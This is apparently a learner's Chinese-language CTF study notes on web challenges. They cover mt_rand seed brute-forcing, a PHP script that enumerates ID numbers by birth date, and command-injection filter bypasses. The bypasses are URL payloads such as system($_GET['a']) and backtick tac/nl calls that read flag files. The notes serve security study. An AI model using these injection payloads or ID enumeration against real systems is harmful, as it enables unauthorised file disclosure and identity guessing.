2021/7/5

爆破入门

可爆破 密码 目录

web25

mt_rand()

随机种子爆破 通过运行脚本https://www.openwall.com/php_mt_seed/(在这下载的)

脚本下载了不会用……

为什么传参有时候在cookie里有时在url里

web27

【题目】爆破生日

如果用火狐浏览器,burp不能直接抓到这个页面的数据,需要在谷歌浏览器里复制请求头

爆破方法:

  • 脚本 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
//遍历日期
<?php
//621022********5237
    $myfile = fopen("zid.txt", "w") or die("Unable to open file!");
    for($year=1990;$year<1993;$year++){
        for($mon=1;$mon<10;$mon++){
            for($day=01;$day<10;$day++){
                $txt=	('621022'.$year.'0'.$mon.'0'.$day.'5237')."\n";
                fwrite($myfile, $txt);
            }
        }
    } 
    for($year=1990;$year<1993;$year++){
        for($mon=1;$mon<10;$mon++){
            for($day=10;$day<=31;$day++){
                $txt=('621022'.$year."0".$mon.$day.'5237')."\n";
                fwrite($myfile, $txt);
            }
        }
    } 
    for($year=1990;$year<1993;$year++){
        for($mon=10;$mon<=12;$mon++){
            for($day=10;$day<=31;$day++){
                $txt=('621022'.$year.$mon.$day.'5237')."\n";
                fwrite($myfile, $txt);
            }
        }
    } 
    for($year=1990;$year<1993;$year++){
        for($mon=10;$mon<=12;$mon++){
            for($day=01;$day<10;$day++){
                $txt=('621022'.$year.$mon."0".$day.'5237')."\n";
                fwrite($myfile, $txt);
            }
        }
    } 
    fclose($myfile);
?>
  • intruder遍历(payload设置Date)

命令执行入门

(代码灰色说明有反向单引号)

web29

绕过过滤 flag和i被过滤了

  • 用’’ 过滤

    1
    /?c=echo` nl fl''ag.php;`

  • 另起一个变量

    1
    2
    3
    /?c=system($_GET['a']);&a=nl fla?.php;
    //?是占位符 代表一个 类似正则表达
    //*也是占位符 代表多个

  • 或者

    1
    2
    url/?c=system("cp fla?.php 1.txt") ;
    //一定要有;结尾   与?>等价

    然后访问url/1.txt

web30

绕过过滤 flag system 和 php被过滤了

  • 用’’过滤

    1
    /?c=echo `nl fl''ag.p''hp`;//查看源代码

  • *

    1
    /?c=echo `tac *`;

  • /?c=cp fla?.??? 1.txt;然后访问 url/1.txt //反向单引号等同system()

命令行

linux 下命令行

cat 从第一行开始,显示文件的所有内容

tac 从第最后一行开始,显示文件的所有内容(正好与cat相反)

more 根据窗口大小,一页一页的实现文件内容

less 和more类似,但是优点是是可以往前翻页和搜索字符

head 只显示前几行

tail 只显示后几行

nl 类似于cat -n,显示时输出行号

绕过合集

https://www.cnblogs.com/Mikasa-Ackerman/p/qian-xiphp-ming-ling-zhi-xing.html 浅析php命令执行

信息泄露

https://blog.csdn.net/qq_46150940/article/details/113788511

抓包
  • burpsuite
  • firefox hackbar(f12)检查cookie等等
  • hackbar(f12)(有点难搞 还不会)
解码
  • base64 √ 得到flag
  • url
  • md5
  • unicode